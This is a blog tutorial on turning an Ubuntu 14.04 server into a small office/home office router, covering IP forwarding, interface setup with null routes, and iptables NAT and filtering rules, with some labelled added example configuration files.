<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 700; white-space: pre-wrap;">How to create a SOHO router using Ubuntu Linux</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">Posted 2016-03-01 on the blog "Net = Packet Header != Security ? 0 : 1" (information security, penetration testing, and network architecture materials).</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On Security Weekly Episode 452, I presented a technical segment on how to build your own small office / home office wired router. This blog post lists the essential components and expands upon the technical segment. Our goal is to build a multi-segment wired router that performs Network Address Translation (NAT) for IPv4, runs Internet Software Consortium (ISC) Bind9 for domain name service, and runs the ISC DHCP server to deliver IP addresses on the inside of your network. </span></b></div>
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">NOTE: Supporting configuration files associated with this blog post can be found at </span><a href="https://bitbucket.org/jsthyer/soho_router" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://bitbucket.org/jsthyer/soho_router</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">From a hardware standpoint, you can choose any computer with two or more network interfaces that will support an Ubuntu 14.04.4 LTS server installation. I would recommend a minimum of 1024MB (1GB) of RAM and 16GB of hard disk space. Some hardware that I have found useful includes the Soekris Net6501 (</span><a href="http://soekris.com/products/net6501-1.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://soekris.com/products/net6501-1.html</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), or the Netgate RCC-VE 2440 (</span><a href="http://store.netgate.com/ADI/RCC-VE-2440.aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://store.netgate.com/ADI/RCC-VE-2440.aspx</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">).</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The starting point for building the router is to install Ubuntu-14.04.4 LTS server (64-bit), and then install the following additional packages:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apt-get install bind9</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apt-get install isc-dhcp-server</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apt-get install ntp</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next and very important step is to ensure that IP forwarding is turned on in your kernel. If you don’t do this, you don’t route any packets and the game is over. To enable IP forwarding, add the following lines to the bottom of the /etc/sysctl.conf file and reboot your system. Note that while we are changing the system configuration, we will also disable IPv6, since you are probably not using it.</span></b><br />
<br />
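<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">As an added example (not the configuration from the original post or its Bitbucket repository), here is a /etc/sysctl.conf fragment that enables forwarding and disables IPv6 as described above, and adds a few kernel-level anti-spoofing settings that complement the null routes and bogon drops used later in this article:</span></div>

```text
# Appended to /etc/sysctl.conf (added example; apply with "sysctl -p" or reboot)

# Without this the box is a host, not a router: nothing is forwarded between interfaces.
net.ipv4.ip_forward = 1

# The post does not use IPv6, so disable it on every interface, present and future.
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

# Extra hardening (added here, not in the original post).
# Strict reverse-path filtering drops packets whose source address is not
# reachable back through the interface they arrived on, e.g. an RFC1918
# source arriving on the WAN interface.
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
# A gateway should neither honour nor emit ICMP redirects, nor accept
# source-routed packets.
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
# Log packets with impossible source addresses to the kernel log.
net.ipv4.conf.all.log_martians = 1
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">After applying, confirm with "sysctl net.ipv4.ip_forward"; it must print 1 or nothing will be routed.</span></div>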
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><br /></b></span></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-1ad7e20a-343f-c34b-ecaf-5f4966a54496" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b></span></b></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-1ad7e20a-343f-c34b-ecaf-5f4966a54496" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="70" src="https://lh5.googleusercontent.com/QbErAA95s_6JiH8vWRveNAN34AeqqVoBW2VFneOSBzZPoayMsFX9aj6HzZWH13A6Ii3TSjGl0ThEcWP1nIHp_iMkobDDpUYCcakEYqLIU44yYDag2ilLArCHXeEfVEG0sLUo0zev" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="414" /></span></b> </span></b></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/sysctl.conf</span></b></b></div>
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The core of the configuration for a router is to make sure that your network interfaces are configured properly, and that your IPTABLES configuration is setup to properly translate, and forward traffic to the Internet.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Network Interface Configuration</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Starting with network interfaces, we will assume that your public Internet address can either be static or obtained via DHCP. We will assign the Linux network interface “eth0” to be the Wide Area Network (WAN) connection to your Internet Service Provider. Just for demonstration purposes, we will assume a static Internet address of 255.1.1.2 and a network mask of /30. Your ISP’s device will be assigned 255.1.1.1. Your public network subnet mask is calculated using the following math: subnet mask = 2^32 - 2^(32-30) ⇒ 255.255.255.252 in dot quad notation. We will also assume that you have a total of four network interfaces on your router device which will yield up to three internal network segments. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Listed below is the top section of what will be the /etc/network/interfaces file. This not only contains the “eth0” definition, but also contains some additional security features in the form of “null routes” for any RFC1918 network traffic that appears with a shorter prefix than the connected interfaces (so that a private destination not covered by one of the connected segments is discarded rather than sent to your ISP), and also routes multicast (224.0.0.0/4) to the bit bucket. If you need to use DHCP for your Internet public address, you can un-comment the marked entries for the “eth0” interface that start with “using dhcp”, and comment out the static address part. One more aspect is that the iptables rules are expected to be listed in /etc/iptables.rules. More about this later in the article.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="430" src="https://lh5.googleusercontent.com/lMFBoaOdMCw09gY8DQAbtAQQkimM6EdW5lYI9-StqGCkjHwiY6z2WnL3AlYjE0u1Znh0PZzxok_JbGzkUfny1e8pCFxyagDPwDGGdOLeEYurbMLXVTNTcU_j_eeYeEy6TvoWUmum" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="501" /></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/network/interfaces</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now we need to establish what the internal / inside interfaces of our network look like. For simplicity, we will use class C (/24) networks and assign them the addresses 10.1.1.0/24, 10.1.2.0/24, and 10.1.3.0/24 respectively. This is how you configure the remainder of the /etc/network/interfaces file to reflect this.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="296" src="https://lh3.googleusercontent.com/YgboQ7BOtoVMoNSTHVDDLsBH5-6oPpsfpDVFlc46yyZ2dSDE3Ou0f2Bz8svD0eQoEL8TschaDKDNVvYj6nJZ-HTH5kf4SI32OdmP6V4r2xZt8eYS-UFlZH4GMdRTyjWtDaPuzU_7" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="239" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/network/interfaces</span></div>
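<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">The two screenshots above are images, so the following /etc/network/interfaces is an added example written to match their description: the static 255.1.1.2/30 WAN address on eth0 with a commented DHCP alternative, RFC1918 and multicast null routes, the firewall loaded from /etc/iptables.rules, and eth1 to eth3 on 10.1.1.0/24, 10.1.2.0/24 and 10.1.3.0/24. It is not the author's file; the interface names and the use of blackhole routes for the null routes are assumptions.</span></div>

```text
# /etc/network/interfaces (added example, not the original post's file)
auto lo
iface lo inet loopback

# WAN: static address from the ISP (demonstration values from the article).
# The /30 mask 255.255.255.252 leaves exactly two usable hosts: the ISP
# side (.1) and this router (.2).
auto eth0
iface eth0 inet static
    address 255.1.1.2
    netmask 255.255.255.252
    gateway 255.1.1.1
    # Load the firewall before the link comes up so there is no unfiltered window.
    pre-up iptables-restore < /etc/iptables.rules
    # Null routes: a packet for a private or multicast destination that is NOT
    # one of the connected /24s below is discarded instead of being NATed out
    # to the ISP. The connected /24 routes are more specific, so they still win.
    post-up ip route add blackhole 10.0.0.0/8
    post-up ip route add blackhole 172.16.0.0/12
    post-up ip route add blackhole 192.168.0.0/16
    post-up ip route add blackhole 224.0.0.0/4
    pre-down ip route del blackhole 10.0.0.0/8
    pre-down ip route del blackhole 172.16.0.0/12
    pre-down ip route del blackhole 192.168.0.0/16
    pre-down ip route del blackhole 224.0.0.0/4

# using dhcp: swap the comment markers on the two eth0 stanzas if the ISP
# hands out the public address dynamically. Keep the pre-up and the null
# routes in the dhcp stanza as well.
#auto eth0
#iface eth0 inet dhcp
#    pre-up iptables-restore < /etc/iptables.rules

# Inside segments: the router owns .1 on each /24.
auto eth1
iface eth1 inet static
    address 10.1.1.1
    netmask 255.255.255.0

auto eth2
iface eth2 inet static
    address 10.1.2.1
    netmask 255.255.255.0

auto eth3
iface eth3 inet static
    address 10.1.3.1
    netmask 255.255.255.0
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">After "ifup eth0", "ip route show" should list the four blackhole entries next to the default route; if it does not, the firewall is up but the null routes are not.</span></div>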
<br /><br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IPTABLES Rules Configuration</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As listed in the network interfaces configuration file, we are going to create the file /etc/iptables.rules, and depend upon the networking code to load the configuration when the system boots. We can also test our iptables configuration at any time using the “iptables-restore” command. The IPTABLES configuration is broken into two sections: Network Address Translation (NAT) and filtering. In short, performing Network Address Translation with IPTABLES is a one-liner. In this example, we assume that the internal network is addressed in the 10.0.0.0/8 range, and that the public Internet Protocol address (WAN interface) is configured on “eth0”. As a bonus, if you want to run the Squid web proxy, there is a line to rewrite traffic on internal network segments destined to TCP port 80 to the standard Squid TCP port of 3128.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="276" src="https://lh5.googleusercontent.com/syPHuGLADCi4EIlGUqz8rzn7uyJ-V86NVb-oPxa6stNK73v_oEiKto_oHZ3Qc1Y1yUJSHpiQuWcS2qF6s3p3LrYcA6nEoqHzgCgqudCoR9a1fsRZImekctF2ZMFhcE_AF-Dh4Yvx" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="527" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">NAT section of /etc/iptables.rules</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Having created the NAT section of the iptables ruleset, you are still required to create the filtering rules to determine what is going to ingress and egress your actual gateway router system, as well as determine what traffic will forward across your router. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I am going to break the filter section of the IPTABLES rules down into the following parts of this article:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being received by the router (INPUT)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being sent by the router (OUTPUT)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being forwarded across the router (FORWARD)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being logged by the router (LOG_DROPS)</span></div>
</li>
</ol>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We will start the filtering section of the IPTABLES configuration by adding a “LOG_DROPS” chain to the rule set. This will allow us to write log entries for any traffic that is dropped. After that, we will implement some common-sense network protections for the router itself, which include:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any traffic to “eth0” that sources from 0.0.0.0/8</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any traffic to “eth0” that sources from RFC1918 addresses</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any traffic to “eth0” that sources from a multicast address (224.0.0.0/4)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping fragmented IP traffic</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping ingress packets that have an IP TTL less than 4.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any packets destined to TCP/UDP port 0.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any packets with all or no TCP flags set</span></div>
</li>
</ul>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="435" src="https://lh4.googleusercontent.com/rrbM3NC3CvfOR1fOiDexbAdKl0KJkIyUuXEK0l2lD8iswY_N6gu5PFIAvoB_WuHqz4TrQrsfu3_KJAeF4nYxWuO9zbU-bfD6FrCABSGiGspT2B0r14BOyb-Ft3XMcYtqOw0i_NSB" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="490" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Starting portion of “filter” section. Common sense protections.</span></div>
